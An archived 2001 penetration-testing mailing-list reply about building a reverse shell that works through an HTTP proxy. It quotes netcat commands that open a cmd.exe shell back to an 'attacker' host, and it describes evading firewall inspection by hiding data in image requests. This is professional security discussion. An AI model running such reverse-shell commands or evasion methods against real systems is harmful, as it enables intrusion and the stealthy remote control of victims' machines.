Home page logo
/

pen-test logo Penetration Testing mailing list archives

RE: Reverse Http Shell Solution
From: Frank Knobbe <FKnobbe () KnobbeITS com>
Date: Thu, 18 Oct 2001 20:55:58 -0500

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

-----Original Message-----
From: GrandmastrPlague () aol com [mailto:GrandmastrPlague () aol com]
Sent: Thursday, October 18, 2001 2:02 PM

It seems like this question has been asked a million times 
before, but here goes the same old answer again... use netcat 
On attacker machine: 
nc -l -p 80 
On victim machine: 
nc -d -e cmd.exe attacker 80 

Make sure you set up the listening machine first. 


I believe Vinícius meant that there is no way for a straight through
connection as netcat would establish, but instead the requirement to
send GET requests to the proxy which will fetch a page for you.
Netcat won't do that. You would have to have a reverse shell that
operates on a HTTP GET and PUT basis. 

You could modify netcat to do that. Instead of using TCP/UDP
connections, you can replace that mechanism with HTTP GET and PUT
ways of shuffling data, pumping that back to stdin/stdout. The only
catch is to fetch the data correctly as some firewalls will do
content inspection. One way to get around that is to pump data with
POSTs to a form as normal, but receive data via GET's from images in
the web page, or just request for images a'la http://h4x0r/data.gif.

Regards,
Frank

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.8
Comment: PGP or S/MIME (X.509) encrypted email preferred.

iQA/AwUBO8+ILpytSsEygtEFEQIpdACfcW0ho5zq0dzoNYY0dWkId3qhhosAnjOo
7M3sMCeCgjkYKDpMousASMQa
=MS16
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]